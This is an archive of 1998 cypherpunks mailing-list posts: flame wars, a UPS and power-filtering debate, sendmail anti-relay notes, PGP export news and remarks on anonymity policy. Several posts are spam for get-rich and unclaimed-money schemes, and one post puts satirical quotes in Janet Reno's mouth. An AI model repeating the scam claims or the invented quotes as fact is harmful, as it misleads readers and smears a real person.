And what planet do you live on?

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Thu, 19 Mar 1998 13:40:06 -0800 (PST)
To: jkwilli2@unity.ncsu.edu
Subject: Re: UPSs
Message-ID: <7341d3ab.3511906d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-19 05:36:18 EST, jkwilli2@unity.ncsu.edu writes:

<< How many times have you been struck by lightning, Stan?  The effects are
 showing...  >>

That, my fellow cypherpunks, was known as a 'ad hominem' attack (an attack on
(supposed) character, because Ken Williams is too STUPID (after all, he's a
"Know-nothing") to be able to attack what I've said.)

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Thu, 19 Mar 1998 13:39:32 -0800 (PST)
To: whgiii@invweb.net
Subject: A little Paranoid, William?
Message-ID: <48360fab.3511906d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Their paranoia is something else that shows you who they are ("Know-nothings")
-

In a message dated 98-03-19 07:25:54 EST, whgiii@invweb.net writes:

<< -----BEGIN PGP SIGNED MESSAGE-----
... 
 -----BEGIN PGP SIGNATURE-----
 Version: 2.6.3a-sha1
 Charset: cp850
 Comment: Registered_User_E-Secure_v1.1b1_ES000000
 
 iQCVAwUBNREBTo9Co1n+aLhhAQE0tAP9GR39xeKrtAYRc31BjhjC6EGRqOI46we0
 NFBwTWXX6saynTvEo4gdk35Kko9W/cEKAxNsOmjDz8zsFaCX0LJNtzzcVai6g7/t
 o8GLb/PbDv3i1rMw/1vJqyvMH6D2d3IuIQvUFg0luNeHnSxUT+cze1r4moeHw+Fj
 yTDV7hk+lb4=
 =cOih
 -----END PGP SIGNATURE----- >>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thecompanyprez@a-vip.com
Date: Thu, 19 Mar 1998 23:38:31 -0800 (PST)
To: Friend@public.com
Subject: 9 out of 10 Americans are owed an average of $1,200.00 each!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


There is over 400 BILLION DOLLARS in unclaimed and 
lost money in North America and we want to help people 
get their money back! 

In a continuing effort to inform the public of this money, 
Personal Funds Recovery, Inc. is launching an INFOMERCIAL
to air across North America. This INFOMERCIAL will educate millions 
of viewers about the over 400 BILLION DOLLARS that needs to be 
returned to it's rightful owners.
 
We are looking for 300 INDEPENDENT AGENTS who will become 
a part of this campaign. Each Agent will own an exclusive territory 
and will receive a percentage of every lead generated from the national 
informercial!  Your involvement will be very financially rewarding.  

Visit our website at <A HREF="http://www.link2web.net/owedmoney/money.html"</A> 
to find out more about the opportunity and how you can get involved.



********************************
If you wish to be removed
please hit REPLY
and type REMOVE in the
subject line and your 
request will be honored
immediately.
********************************








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thecompanyprez@a-vip.com
Date: Mon, 23 Mar 1998 20:09:17 -0800 (PST)
To: Friend@public.com
Subject: 9 out of 10 Americans are owed an average of $1,200.00 each!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


There is over 400 BILLION DOLLARS in unclaimed and 
lost money in North America and we want to help people 
get their money back! 

In a continuing effort to inform the public of this money, 
Personal Funds Recovery, Inc. is launching an INFOMERCIAL
to air across North America. This INFOMERCIAL will educate millions 
of viewers about the over 400 BILLION DOLLARS that needs to be 
returned to it's rightful owners.
 
We are looking for 300 INDEPENDENT AGENTS who will become 
a part of this campaign. Each Agent will own an exclusive territory 
and will receive a percentage of every lead generated from the national 
informercial!  Your involvement will be very financially rewarding.  

Visit our website at <A HREF="http://www.link2web.net/owedmoney/money.html"</A> 
to find out more about the opportunity and how you can get involved.



********************************
If you wish to be removed
please hit REPLY
and type REMOVE in the
subject line and your 
request will be honored
immediately.
********************************








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 19 Mar 1998 14:42:19 -0800 (PST)
To: "Michael H. Warfield" <mhw@wittsend.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <Pine.SOL.3.96.980319045525.2632A-100000@rigel.cyberpass.net>
Message-ID: <v03007805b1374f44e903@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain


So I'm told that the new version of sendmail (8.9) has the same antispam
features as 8.8  -- only difference is in defaults. True?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 19 Mar 1998 15:22:08 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: A little Paranoid, William?
In-Reply-To: <48360fab.3511906d@aol.com>
Message-ID: <Pine.LNX.3.96.980319180458.9906A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 19 Mar 1998, StanSquncr wrote:

> Their paranoia is something else that shows you who they are
> ("Know-nothings")

I've heard it said 'Paranoia is reality on a finer scale.'

I believe it.

If you think that signing messages is paranoia, you may be right.. I,
for one, _am_ paranoid. I know the practical attacks that can be made,
and I've seen them work and, and demonstrated how easy they are.
Worse, I've experienced them. Maybe you haven't .. and thats good.
I hope your good luck continues.

But when you stick your neck out for something, you make enemies .. and I
have my fair share of mine.. and I suspect that many here have their too
(.. and when I think about it, they're prolly the same guys.. )

If I had it my way, I'd have all email sent to me encrypted. Next to
nothing, I'll take signed messages any day.


> In a message dated 98-03-19 07:25:54 EST, whgiii@invweb.net writes:
>  -----BEGIN PGP SIGNATURE-----
...
...
>  -----END PGP SIGNATURE----- >>

My keys can be had off of my home page (my rsa 2048 and dh 4096 can be
had off of my hard drive if I am online, else use the 1024 bit RSA key
stored on my provider). PGP encrypted mail more than welcome.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
I think that we should be men first, and subjects afterward. It is not
desirable to cultivate a respect for the law, so much as for the right.
				Henry David Thoreau "Civil Disobedience"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNRGnBQKEiLNUxnAfAQFpTwP+OawQiYahkwovIJaSwmX2xnnYLwbsTD7n
yn8m0X+F/fnbLo5e4qBJTUBBftzC/8PGOKhlQsNpum27kEFpPLvnITPf475uwuH/
9LlLgg7XVrUsvwFJ6N7cECTO5ZKrZNfF8oDezTtHUmvKQqb2CH/ZuGcjsilnF2MJ
5JgGEhI6CGA=
=l+1p
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Thu, 19 Mar 1998 15:29:59 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: UPSs
In-Reply-To: <7341d3ab.3511906d@aol.com>
Message-ID: <Pine.LNX.3.96.980319181602.9906B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 19 Mar 1998, StanSquncr wrote:

> In a message dated 98-03-19 05:36:18 EST, jkwilli2@unity.ncsu.edu writes:
> 
> << How many times have you been struck by lightning, Stan?  The effects are
>  showing...  >>
> 
> That, my fellow cypherpunks, was known as a 'ad hominem' attack (an attack on
> (supposed) character, because Ken Williams is too STUPID (after all, he's a
> "Know-nothing") to be able to attack what I've said.)

Actually, I believe it was because what you said was too stupid to be
attacked.. no offense.

The thread was about TEMPEST-related EMR. .. and your quote in question
was:

>BUT, even the fastest electronics cannot respond fast enough to the initial
>spike, if that spike is too high in the first place (if your incoming power
>lines get hit by lightning, for instance), it's already too late.  My
>suggestion, don't trust a UPS to eliminate spikes, get it if you
> anticipate a need for back-up power to shut down your system in case of
> black-out (and screw the surge protectors, trust the filtering in your
> power supply to do that for you.)

See.. now.. you're clearly talking about power protection.. but, you see
we _weren't_ talking about power outages, we were talking about
compromising emanations being sent through power lines.. and as far
as the UPS goes, whether or not a UPS would help such muffle such
emanations.

Two completely different things. You may as well have said "Yeah, UPS is
great. They have good rates on ground shipping."

In which case the response of..

> << How many times have you been struck by lightning, Stan?  The effects
> are showing...  >>

..might well be appropriate.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
I think that we should be men first, and subjects afterward. It is not
desirable to cultivate a respect for the law, so much as for the right.
				Henry David Thoreau "Civil Disobedience"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNRGo0wKEiLNUxnAfAQHdjAP/QZALkfNwMGXqtoJLSdhhisAclmfDJiON
P0WCSLG2fKhIAs3U54nIFEv/jxootQNZAHEG+/0xfw7NxhuBnphpAyIJ73qpUmee
9xdK7JcjcIgAwRAdbg9dBuWdMs+aIJFIS/ijMffbEy79EHGLvRV4LLRrV5m3A46k
DxqIjpQKzZM=
=y8Q+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 19 Mar 1998 18:12:41 -0800 (PST)
To: gnu@toad.com>
Subject: Wayne Madsen
Message-ID: <3511CFDD.42E@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 3/19/98 6:58 PM

John Young
J Orlin Grabbe
John Gilmore

Here are my notes

  Thursday December 29, 1994 16:45 File MAD1.TXT 

  Memorandum of Record

  At 16:30 I received a call from a

	Wayne Madsen
	3911 Fairfax Square
	Fairfax, VA 22031
	703-876-3081
	        3065 FAX
	wmadsen@explorer.csc.com

  Wayne told me he had a contract to update the Puzzle Palace
  first written by James Bamford.  The contract is with Penguin-
  Viking.  We talked close to 45 minutes.

  Wayne told he saw my name in Wirbel's EE Times articles.

  I gave Madsen some information about my case and where documents 
  can be obtained in the WDC area.

  Madsen told me two disturbing items:

  1	NSA has been inviting White House staff to NSA.   NSA 
	attempts to impress staff with NSA gadgets.

  2	NSA recently invited Tom Clancy to NSA.  Clancy's next novel
	will be about NSA.  Clancy, Wayne told, me is being used as a 
	PR man to obtain more funding for NSA.  

  Madsen also told me that a CRYPTO-AG salesman also got arrested by the
  Iranians for selling them crypto devices which also sent out the key!
  NSA work: called Red Threads or Hidden Threads.

  But let us be a little suspicious.  NSA is fairly good at dirty
  tricks.

  1	Anyone know Madsen?
  2	Is Madsen for real?

  If Madsen is for real, then let us help him with his book.

Madsen recently wrote

  http://caq.com/CAQ/caq63/caq63madsen.html

A former spook did a drive-by of 

        3911 Fairfax Square
	Fairfax, VA 22031

shortly after the phone call from Madsen

The former spook phoned me  again on 07:29 3/16/1998.

The spook did a technical evaluation of the above address.

How may tricycles, cars, shades pulled-down to see if the address 
was possibly a home address.

The spook concluded that the above address may be a 
business.

Let's all, of course, hope for settlement.

bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Thu, 19 Mar 1998 12:01:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: G8 action plan on online anonymity?
Message-ID: <9803191909.AA49210@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


Apparently restrictions on online anonymity have been discussed at
the meeting of the Justice and Interior Ministers of the G8 in
Washington, Dec 8--12, 1997 on "high-tech and organized crime".

>From Janet Reno's press release <URL:
http://www.usdoj.dov/opa/pr/1997/December97/518cr.html>: "each nation
has committed to develop faster ways to trace attacks coming through
computer networks, so that we can quickly identify the hacker or
criminal who is responsible."

What are these fast ways to trace attacks? Did the ministers also
discuss anonymous speech?

Anyone have the full text of the declaration and the action plan?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMongrel <tm@dev.null>
Date: Thu, 19 Mar 1998 18:33:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: G8 action plan on online anonymity?
In-Reply-To: <9803191909.AA49210@public.uni-hamburg.de>
Message-ID: <3511D0F1.23A@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Ulf Mller wrote:
> >From Janet Reno's press release <URL:
> http://www.usdoj.dov/opa/pr/1997/December97/518cr.html>: "each nation
> has committed to develop faster ways to trace attacks coming through
> computer networks, so that we can quickly identify the hacker or
> criminal who is responsible."

Remo also gave an ultimatum to InterNet FreehDumb Fighters, while
banging her shoe on the table, "Fuck with us, and we will *bury*
you!"
Talk quickly turned to discusion of how to best stop the leaks
coming from a wide variety of government agencies which spilled
the beans to the citizens about the kinds of nefarious activities
that their government is *really* engaged in.
"If these scum are allowed to circumvent the cloud of secrecy that
we have thrown over our actions, then National Political Criminal
Security will be endangered." Remo stated.
Those gathered lifted the glasses of free liquor provided by Capital
Hill lobbyists, hollering, "I'll drink to that."

Where'sMine?Monger






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMongrel <tm@dev.null>
Date: Thu, 19 Mar 1998 18:33:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: [Fwd: Re: PROGRAMMERS WANTED !!!]
Message-ID: <3511D4FA.6627@dev.null>
MIME-Version: 1.0
Content-Type: text/plain

It never fails to amaze me that a person can send a letter to a 
politician telling them that they should shove a crowbar up a child's
ass on primetime TV, and get back a reply stating that their opinion
is important to the recipient.

Once technology is further advanced, I am certain that we can look
forward to receiving replies from world leaders which begin with,
"Thank you for the DEATH THREAT!!!"

ButAreYouReallySincereMonger?


To: toto@sk.sympatico.ca
Subject: Re: PROGRAMMERS WANTED !!!
From: Senator_McCain@mccain.senate.gov (Senator McCain)
Date: Wed, 18 Mar 1998 01:51:18 -0500

                                                *Automated response*
     
     Dear Friend:  
     
     Thank you for taking the time to contact my office.  Your views and 
     opinions are important to me.
     
     Due to the high volume of Internet requests that I receive daily, I am 
     unable to provide you with an immediate response.  However, if you have 
     included a current mailing address and phone number, you will receive a    
     response by phone or via the U.S. Postal Service.  If you did not include a
     mailing address and would like to receive a response, please feel free to  
     'reply' to this email, attach a copy of your original message, and be sure 
     to include your postal address and phone number.
     
     Additionally, due to provisions of the Privacy Act of 1974, all federal 
     agencies are prohibited from releasing any information regarding an 
     individual without that individual's written consent.  This protection 
     means that if you are requesting my assistance with a particular agency 
     or casework of any kind, I am unable to help until I have something in 
     writing, complete with signature, from the person concerned to show 
     that I am authorized to check into the matter. Unfortunately, email 
     does not meet this requirement.    
     
     I regret any inconvenience that this delay in corresponding may cause. 
     Again, thank you for contacting my office.  
     
     
     Sincerely,
     
     John McCain
     U.S. Senator
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Briggs <ian@deepwell.com>
Date: Fri, 20 Mar 1998 20:45:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fucking Sheeple / Re: Does Spamming Really Exist?
In-Reply-To: <3512E780.5FBD@dev.null>
Message-ID: <3.0.3.32.19980319203802.0095e384@deepwell.com>
MIME-Version: 1.0
Content-Type: text/plain


>I will petition the government to pass laws to prevent your ISP 
>from spamming me with posts such as this, which reflect nothing
>more than the standard Sheeple position that anything which you 
>do not personally desire should be outlawed.
>
>"That which is not permitted, is forbidden."
>~ Animal Farm


Whine Whine Whine.
You want some cheeze?

Sweaping generality, yes those of us that want everything we don't agree
with put
under penalty of death.

Instantly.

No, wait.  Lets change that, we put those that don't agree with us on work
projects for the 4th Reich.

Yeah, thats what I really meant
but you have to look really hard into the message to find that undertone
or you have to be a shitneck.

Anyways.

1.  Its theft of services because its using my bandwidth to "harrass" my
customers.
2.  It may destroy my mail server.
3.  It may detrimentally effect the quality of my business.
4.  It destroys other ISP mail server.

So back to your normal ranting, as I doubt anyone doesn't have an
entrenched opinion concerning this.

Im not the happiest person to be inviting the U.S. Goverment into this
media, im pretty opposed to the U.S. Goverment in general and specific terms.

You want to know who we currently call for situations like this?
FBI, executive order gave them all venue over crimes on the Internet via an
executive order.

So guess what, the U.S. goverments already here.
I just don't want Joe Smoooze Dick the Marketing stud starting up his
garage business selling e-mail lists for $99, cause he can.

Ian

by the way, putting @dev.null in your return address
thats pretty tricky, I bet you have a business card
that says 31337.  I bet they teach that in all canadian
schools.  Elite 101.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m6RU9k9pF@edw1hit.com
Date: Thu, 19 Mar 1998 22:33:11 -0800 (PST)
To: ndia@wnxt.it
Subject: NDIA's 24th Environmental Symposium & Exhibition
Message-ID: <3jAeNh12OTUwd1UR5>
MIME-Version: 1.0
Content-Type: text/plain


PLEASE JOIN US AT
NDIA's 24th Environmental Symposium & Exhibition
"Smart Business Practices for Mission Readiness and Environmental
Sustainability"
April 6-9, 1998
Tampa Convention Center
Tampa, FL

Speakers Include:
Ms. Sherri Goodman
Deputy Under Secretary of Defense, Environmental Security
and
The Honorable Jacques Gansler
Under Secretary of Defense, Acquisition & Technology

This meeting provides a national forum for the free exchange of
environmentally related policies, programs, related technical
information and ideas from individuals, educational institutions,
professional associations and societies, representatives of private
companies and corporations and officials of Federal and State government
agencies and regulatory bodies.

You will also have the opportunity to attend Air Force Industry Day on
Wednesday, April 8th.  This is definitely a "can't miss" event!

Exhibit space is still available!  Please mailto:ckline@ndia.org for
more information and a current floorplan.

To view the complete agenda and hotel information, please visit our web
page at http://www.ndia.org/events/brochure/844/844.htm

We hope to see you in sunny Tampa, FL!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: millions5@juno.com
Date: Thu, 19 Mar 1998 19:43:24 -0800 (PST)
To: <cypherpunks-unedited@toad.com>
Subject: Millionaire in six months
Message-ID: <258161_44888744>
MIME-Version: 1.0
Content-Type: text/plain




LOCAL MILLIONAIRE  Willing  to  teach  5  men
or  women proven  method for becoming a millionaire in six
months. No experience necessary - However, applicant must
have strong reason for becoming rich.

Call  24 Hrs.  888-355-6909  or  714-951-3066

http://www.freeyellow.com/members2/mlmbabes/
Email:  Million4UNME@juno.com



To be removed from All mailings, reply with "remove"
in the subject line.  Thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Thu, 19 Mar 1998 17:19:37 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: Will New Sendmail Block Remailers?
In-Reply-To: <v03007805b1374f44e903@[168.161.105.216]>
Message-ID: <Pine.LNX.3.96.980320001829.6979B-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Mar 1998, Declan McCullagh wrote:

> So I'm told that the new version of sendmail (8.9) has the same antispam
> features as 8.8  -- only difference is in defaults. True?

The closest to a noticeable change I've spotted is that the simple
anti-relaying rules (check_rcpt) are now part of the sendmail.cf by
default. (No longer do they have to be downloaded separately and hacked in
by hand.)  There are more complex anti-relaying configurations that can be
specified now, also (for permitting certain parties/domains to relay, or
to only restrict certain groups from relaying).

In other words, not much has changed.

dave


----- David E. Smith, P O Box 324, Cape Girardeau MO 63702
http://bureau42.base.org/people/dave/ dave@bureau42.ml.org

Random IRC Quote:
[topic(#linux)] New MS motto: "Gehirnwesche die Kinder, wenn sie jung
  sind.  In ihren Erwachsensein sind sie Ihre bereiten Sklaven. [TM]"
  (Brainwash the children.  When they are adults they will be your slaves)
topic set by Bascule [Sat Jan 24 05:57:42 1998]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: op319@juno.com
Date: Thu, 19 Mar 1998 18:04:33 -0800 (PST)
To: <cypherpunks-unedited@toad.com>
Subject: Make 6 Figure Income Working In Your Pajamas !!
Message-ID: <77940725_18189>
MIME-Version: 1.0
Content-Type: text/plain




 Make 6 Figure Income Working In Your Pajamas !!

Each day I get out of bed, brush my teeth and walk into 
the next room to begin my work day..... Still in my PJs! 

And who am I working with, you ask. 
  
Well, my strategic partners are major corporations like:

   Netscape
   UUNet
   Oracle
   Sun Microsystems
   Worldcom (soon to be the 2nd largest phone 
             company after merging with MCI)
   Sprint Cellular
       ....Incredible names in the communications industry!!

The products and services from these corporations, which include Internet 
services, telecommunications services and unified messaging services, are 
targeted to the consumer, small office and home office (SOHO) markets.  
And there is even more coming in the next few months!

And NO, it does not cost the king's ransom to sign up.   How about $25?!!!

Want more info?   Reply with PAJAMAS in the subject.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dc@panix.com (David W. Crawford)
Date: Fri, 20 Mar 1998 00:24:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: NETA & exporting PGP
Message-ID: <xz3yay5ahwy.fsf@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



March 20, 1998


        Export Law Tested by Sale of Privacy Software

        SAN FRANCISCO -- An American maker of
        data-scrambling software said Thursday that it would
        circumvent U.S. export policies by allowing its Dutch
        subsidiary to begin selling an international version of Pretty
        Good Privacy, a strong encryption program that does not
        provide a back door for law enforcement surveillance. 

        Because the company, Network Associates, is the nation's
        largest independent maker of computer security software, its
        action could have a serious effect on U.S. export policies on
        software. 

        Network Associates' decision to sell a program specifically
        prohibited by the Commerce Department comes at a time when
        the Clinton administration is already fighting congressional
        attempts to end export controls on encryption software for fear
        that such restrictions will hurt the ability of American industry
        to compete internationally. 

        [...]


http://www.nytimes.com/library/tech/yr/mo/biztech/articles/20encrypt.html

David W. Crawford    <dc@panix.com>
Los Gatos, CA       

ps
If there is an addres preferred to cypherpunks@toad.com, let me know.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 19 Mar 1998 18:38:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Make 6 Figure Income Working In Your Pajamas !!
Message-ID: <199803200238.DAA24210@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


op319@juno.com wrote:
> 
>  Make 6 Figure Income Working In Your Pajamas !!

I had a girlfriend who used to do that...does that make me a pimp?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: newsdirectories@juno.com
Date: Thu, 19 Mar 1998 23:56:24 -0800 (PST)
To: <cypherpunks-unedited@toad.com>
Subject: Powerful New Advertising Software
Message-ID: <17177016_47687087>
MIME-Version: 1.0
Content-Type: text/plain



POWERFUL NEW ADVERTISING SOFTWARE!                 

  When Advertising on the Internet , Just Isn't  Enough.

        Introducing NATIONWIDE NEWSPAPERS!

              An Electronic Directory of Over 3,600 Papers!

               Includes Statewide & Group Network Associations.

              Pricing, Circulation, Discounted Rates, Phone Numbers, & More!

        List Includes Dailies, Weeklies, Shoppers, Community Papers & More! 

  Save Time & Money, 1 Call, 1 Payment & You're in 100's of Papers!

   
For More Information, Reply ASAP To: <AdSoftware@juno.com>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <n9505834@garbo.nepean.uws.edu.au>
Date: Thu, 19 Mar 1998 13:58:22 -0800 (PST)
To: StanSquncr <StanSquncr@aol.com>
Subject: Re: Chicken "anons" and "nobody's"
In-Reply-To: <31b0872b.3511906c@aol.com>
Message-ID: <Pine.OSF.3.96.980320085655.29231P-100000@oberon>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Mar 1998, StanSquncr wrote:

> In a message dated 98-03-19 05:11:50 EST, jkwilli2@unity.ncsu.edu writes:
> 
> << Well, Stan, all of the news you read ultimately comes from the one person
>  selected by Clinton to drive The Propoganda Machine up in Washington, DC. >>
> 
> And what planet do you live on?

Yar, everybody knows that it is Rupid Murdoc who runs all the news.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. 
Support NoCeM http://www.cm.org/                   
I'm sorry but I just don't consider 'because its yucky' a convincing argument





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Thu, 19 Mar 1998 15:49:37 -0800 (PST)
To: "'StanSquncr'" <cypherpunks@toad.com
Subject: RE: UPSs
Message-ID: <ED111D55D096D111A1990000F8794AF506E274@itfexch3.isd.tafensw.EDU.AU>
MIME-Version: 1.0
Content-Type: text/plain


Hi Stan,

A simple low pass filter made of 2 large inductors and a
few high voltage capacitors will do the trick nicely.
Which is not a slow reacting device being passive.
Combine this with polyswitch style protection and some method
of discharging a really high voltage to ground and it'll be
even better.

A very cheap design that should be in all UPS's.
And is certainly a whole lot better than nothing at all
for removing harzardous spikes, etc.


> -----Original Message-----
> From:	StanSquncr [SMTP:StanSquncr@aol.com]
> Sent:	Thursday, March 19, 1998 4:59 PM
> To:	spectre@anthrax.net; cypherpunks@toad.com
> Subject:	Re: UPSs
> 
> In a message dated 98-03-18 23:54:33 EST, spectre@anthrax.net writes:
> 
> << ... Any decent ups will put the incoming power
>  through a "conditioner" that will filter out noise in the incoming
> power,
>  and rebuild the wave so that transient sags and spikes don't get
> through. ...
> >>
> 
> BUT, even the fastest electronics cannot respond fast enough to the
> initial
> spike, if that spike is too high in the first place (if your incoming
> power
> lines get hit by lightning, for instance), it's already too late.  My
> suggestion, don't trust a UPS to eliminate spikes, get it if you
> anticipate a
> need for back-up power to shut down your system in case of black-out
> (and
> screw the surge protectors, trust the filtering in your power supply
> to do
> that for you.)
> 
> Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tryit <Tryit@Ipswitch.com>
Date: Fri, 20 Mar 1998 09:56:28 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: WS_FTP Pro 5.0 from Ipswitch, Inc. Now Available!
Message-ID: <01C29E4A0C4BD111B1540060979D31222DE7E5@download.ipswitch.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Joe:

FILE TRANSFER OVER THE INTERNET JUST GOT EASIER!

As a user of WS_FTP Limited Edition from Ipswitch, you know that file
transfer between your local PC and a remote FTP server is a breeze.
We're happy to announce the availability of WS_FTP Pro 5.0, with a
CHOICE of user interfaces.  Select the all-new, easy-to-use Windows
Explorer interface, the classic WS_FTP Pro interface, or both and
transferring files over the Internet just got easier!  Powered by the
same reliable WS_FTP engine, the new Windows Explorer interface
provides:

-  Seamless integration with Microsoft Windows Explorer
-  Support for "remote-to-remote" transfers

WS_FTP Pro 5.0 also provides the following functions and benefits not
found in WS_FTP LE:

-  Drag-and-drop capability between windows
-  Auto re-get of failed file transfers
-  Preserved date and file time on transfer from remote
-  Prompt for overwrite of same or newer files
-  Won't transfer old or same files during directory transfers
-  Product manual plus telephone or e-mail technical support 

FREE FULL-FEATURED EVALUATION DOWNLOAD

Learn a lot more about WS_FTP Pro 5.0 by visiting our Web site at:

http://www.ipswitch.com/products/WS_FTP

While you're there, download a free evaluation copy to check out the
impressive new features of WS_FTP Pro 5.0.

And once you download the software you will be automatically entered
into our Download to Win contest.  You may be the lucky winner of a free
copy of WS_FTP Pro 5.0.  Install and win today!

ORDER NOW

WS_FTP Pro 5.0 is available for just $37.50.  Purchase it electronically
through our on-line store, by phone (1-800-793-4825), or simply print
and return our Web-based fax-back order form:

http://www.ipswitch.com/purchase


Finally, we want to thank you for your interest in WS_FTP Pro and other
great Ipswitch products.

****************************************************
P.S.  This message is intended as a service to Ipswitch customers and
visitors to our Web site.  To be removed from any future mailings please
reply with DELETE in the subject line. 
-----------------------------------------
Ipswitch, Inc.
81 Hartwell Ave.
Lexington, MA 02173
Phone: (781) 676-5700
Fax:  (781) 676-5710

Web:     http://www.ipswitch.com
E-mail:  sales@ipswitch.com


Check out our Web site for more information on these exciting Ipswitch
products:

-  IMail Server for Windows NT - Internet Messaging
-  WhatsUp Gold - Enterprise Network Monitoring
-  WS_Ping ProPack - Internet Utilities
-  VT320 Telnet and TNHOST Terminal Emulators











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Fri, 20 Mar 1998 13:09:10 -0800 (PST)
To: StanSquncr@aol.com
Subject: Re: UPSs
Message-ID: <199803202103.NAA06318@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain


All,

I cannot remember all of the equations that go into this, and only a very
simplistic approach follows, but ...

If your surge protector is a semi-conductor, it probably will be 
self-limiting.  That is, it will reach a maximum block, and pass
whatever is above that.  A Trans-sorb device, and those chemical ones, 
all limit what they do based upon a total absorption.  A lot of little
ones kills it the same as a single big one.  None of these tell you 
they are no longer operable.

However, if the UPS is properly built, it will have an inductor as the
leading serial device in a set of 'things'.  I would expect a set of
capacitors, in parallel with my load, on either side, appropriately 
sized.  The battery that makes the 'U' in the UPS acts like another
capacitor.  These act as fast as the spike, ALWAYS.  The sizes and number
of components requires some calculations (testing does NOT hurt, either).

Stan needs to review his basic electronics.  Yes, it will even protect
against lighting if designed for that purpose.  Costs vary accordingly ...

Bob De Witt,
rdew@el.nec.com
The views expressed herein are my own,
and are not attributable to any other
source, be it employer, friend or foe.


> From StanSquncr@aol.com Wed Mar 18 22:44:02 1998
> From: StanSquncr <StanSquncr@aol.com>
> Date: Thu, 19 Mar 1998 00:59:19 EST
> To: spectre@anthrax.net, cypherpunks@toad.com
> Mime-Version: 1.0
> Subject: Re: UPSs
> Content-transfer-encoding: 7bit
> 
> In a message dated 98-03-18 23:54:33 EST, spectre@anthrax.net writes:
> 
> << ... Any decent ups will put the incoming power
>  through a "conditioner" that will filter out noise in the incoming power,
>  and rebuild the wave so that transient sags and spikes don't get through. ...
> >>
> 
> BUT, even the fastest electronics cannot respond fast enough to the initial
> spike, if that spike is too high in the first place (if your incoming power
> lines get hit by lightning, for instance), it's already too late.  My
> suggestion, don't trust a UPS to eliminate spikes, get it if you anticipate a
> need for back-up power to shut down your system in case of black-out (and
> screw the surge protectors, trust the filtering in your power supply to do
> that for you.)
> 
> Stan
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
